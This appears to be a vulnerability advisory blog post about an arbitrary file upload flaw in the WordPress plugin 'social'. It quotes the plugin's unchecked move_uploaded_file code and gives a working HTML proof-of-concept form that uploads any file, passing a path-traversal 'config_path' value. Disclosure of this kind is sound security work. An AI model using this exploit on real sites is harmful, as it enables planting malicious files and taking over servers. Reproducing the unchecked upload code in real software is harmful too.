30 Jan

Vulnerability Details: Arbitrary File Upload Vulnerability in social

One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/social-networking-e-commerce-1/js/effects.js, from the plugin social. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

Seeing as the type of vulnerability that is probably the most likely to be exploited is an arbitrary file upload vulnerability and seeing as other plugins that were also targeted in the same set of requests as this one have that type of vulnerability, we started looking over the plugin for that type of vulnerability and we immediately found one.

In numerous files there is code that looks like it will take a file sent with a request to it and save it to the filesystem. We tested that out with the file /classes/views/social-options/form_cat_add.php to confirm the issue. That happens in the line that begins move_uploaded_file below, before there is nothing that limits who or what can be uploaded other than need to the provide a POST input “config_path” to indicates where WordPress’ configuration file is (which is usually stored in a standard location):

2
3
4
5
6
7
8
9
10
11
12
13
14
15
session_start();
$config_path = $_POST['config_path'];
require_once( $config_path . 'wp-config.php');
$pathinfo=$_POST['pathinfo'];
$pathinfo1=$pathinfo."/wp-admin/admin.php?page=social-category";
 
if((!empty($_FILES["image"])) && ($_FILES['image']['error'] == 0))
{
$filename = basename($_FILES['image']['name']);
$path= dirname(__FILE__);
$path1=explode("classes",$path);
$path2=$path1[0].'images/uploads/';
$newname = $path2.$filename;
move_uploaded_file($_FILES["image"]["tmp_name"],$newname);

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/plugins/social-networking-e-commerce-1/images/uploads/.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/social-networking-e-commerce-1/classes/views/social-options/form_cat_add.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="config_path" value="../../../../../../" />
<input type="file" name="image" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Leave a Reply

Your email address will not be published. Required fields are marked *